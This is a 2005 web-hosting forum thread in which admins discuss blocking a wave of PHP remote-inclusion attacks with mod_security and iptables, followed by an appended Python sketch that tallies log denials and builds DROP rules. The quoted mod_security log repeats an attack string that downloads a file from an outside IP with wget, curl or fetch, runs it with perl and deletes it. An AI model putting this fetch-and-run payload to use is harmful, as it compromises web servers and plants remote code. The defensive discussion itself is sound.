Ravens PHP Scripts: Forums
 

 

phoenix-cms
Worker



Joined: Aug 05, 2005
Posts: 139

Posted: Tue Oct 25, 2005 7:00 pm

Well, since the .gif bug has been out, at current I have way over 200 DDoS attacks on my server.

In mod security it's showing the following.

Quote:
IP Date Time Handler GET Host Mod_Security-Message Mod_Security-Action
211.38.128.10 2005-10-24 02:59:10 (null) /ts2.5/inc/tell_a_friend.inc.php?script_root= [link hidden by forum] cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.165 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.38.128.10 2005-10-24 02:59:09 cgi-script /ts2.5/inc/tell_a_friend.inc.php?script_root= [link hidden by forum] cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.166 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.38.128.10 2005-10-24 02:59:09 (null) /ts2.5/inc/tell_a_friend.inc.php?script_root= [link hidden by forum] cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.164 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.38.128.10 2005-10-24 02:59:08 (null) /ts2.5/inc/tell_a_friend.inc.php?script_root= [link hidden by forum] cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.163 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.38.128.10 2005-10-24 02:59:08 (null) /ts2.5/inc/tell_a_friend.inc.php?script_root= [link hidden by forum] cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.162 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406


I checked out one of the files where the gif bug is; here is what it is doing.
[link hidden by forum]

This is not my host but what they are using; need to find the client that has this.

What would you suggest as the best way to block IPs from the server? ATM I just added the IPs to httpd.conf with denyall.

thanks

steve

_________________
Evo 3.0 Developer & nukecops.com Admin
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

Posted: Tue Oct 25, 2005 7:09 pm

iptables, of course!
 
phoenix-cms







Posted: Tue Oct 25, 2005 7:41 pm

apf ?
 
Raven







Posted: Tue Oct 25, 2005 7:53 pm

apf is just a front end to iptables.
 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

Posted: Tue Oct 25, 2005 8:37 pm

So it looks like it's attacking the file tell_a_friend.inc.php?
What addon is that?

That IP seems to resolve to napalmrecords.at and s134442471.onlinehome.us

_________________
- Star Wars Rebellion Network -

phoenix-cms







Posted: Tue Oct 25, 2005 8:53 pm

This is what I blocked just today.

Code:


iptables -I INPUT -p tcp --dport 80 -s 68.100.196.243 -j DROP


All the root hack attempts seem to be starting to calm down now, well, unless they try something else :)
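
Added example (not part of the thread and not any poster's code): a Python sketch of the tally-then-block workflow discussed above, counting mod_security denials per source IP and building the same port-80 `iptables` DROP rule quoted in the last post. The column layout is assumed from the quoted log, the threshold and allowlist are hypothetical parameters, and the sample lines are constructed with documentation-range addresses.

```python
import ipaddress
import re
from collections import Counter

def _line(ip, t):
    # Constructed entry in the quoted layout; the request value is elided.
    return (f"{ip} 2005-10-24 {t} (null) /ts2.5/inc/tell_a_friend.inc.php"
            "?script_root=[elided] HTTP/1.1 203.0.113.5 Access denied with "
            'code 406. Pattern match "wget " at THE_REQUEST. 406')

# Constructed sample; addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = "\n".join(
    [_line("192.0.2.10", f"02:59:0{i}") for i in range(4)]
    + [_line("198.51.100.7", f"03:10:0{i}") for i in range(3)]
    + [_line("203.0.113.99", "04:00:00"),
       _line("999.1.1.1", "04:00:01"),   # malformed source field
       "garbled line without the expected columns"])

ENTRY = re.compile(r"^(\S+) \d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} "
                   r".*Access denied with code \d{3}\.")

def denied_counts(log_text):
    """Count denied requests per source IP, skipping unparsable lines."""
    counts = Counter()
    for line in log_text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue
        try:
            ip = ipaddress.IPv4Address(m.group(1))
        except ValueError:
            continue  # log text is attacker-influenced: validate before use
        counts[str(ip)] += 1
    return counts

def drop_rules(counts, threshold=3, allowlist=()):
    """Build (not run) port-80 DROP rules for IPs at or above threshold."""
    allowed = [ipaddress.ip_network(net) for net in allowlist]
    rules = []
    for ip, n in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0])):
        if n < threshold or any(ipaddress.ip_address(ip) in a for a in allowed):
            continue  # too few hits, or an address we must never block
        rules.append(f"iptables -I INPUT -p tcp --dport 80 -s {ip} -j DROP")
    return rules

if __name__ == "__main__":
    counts = denied_counts(SAMPLE_LOG)
    for ip, n in counts.most_common():
        print(f"{n}\t{ip}")
    print("\n".join(drop_rules(counts, allowlist=["198.51.100.0/24"])))
```

The rules are only printed so they can be reviewed before being applied; the allowlist keeps your own management or monitoring ranges from being locked out.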
 
All times are GMT - 6 Hours
 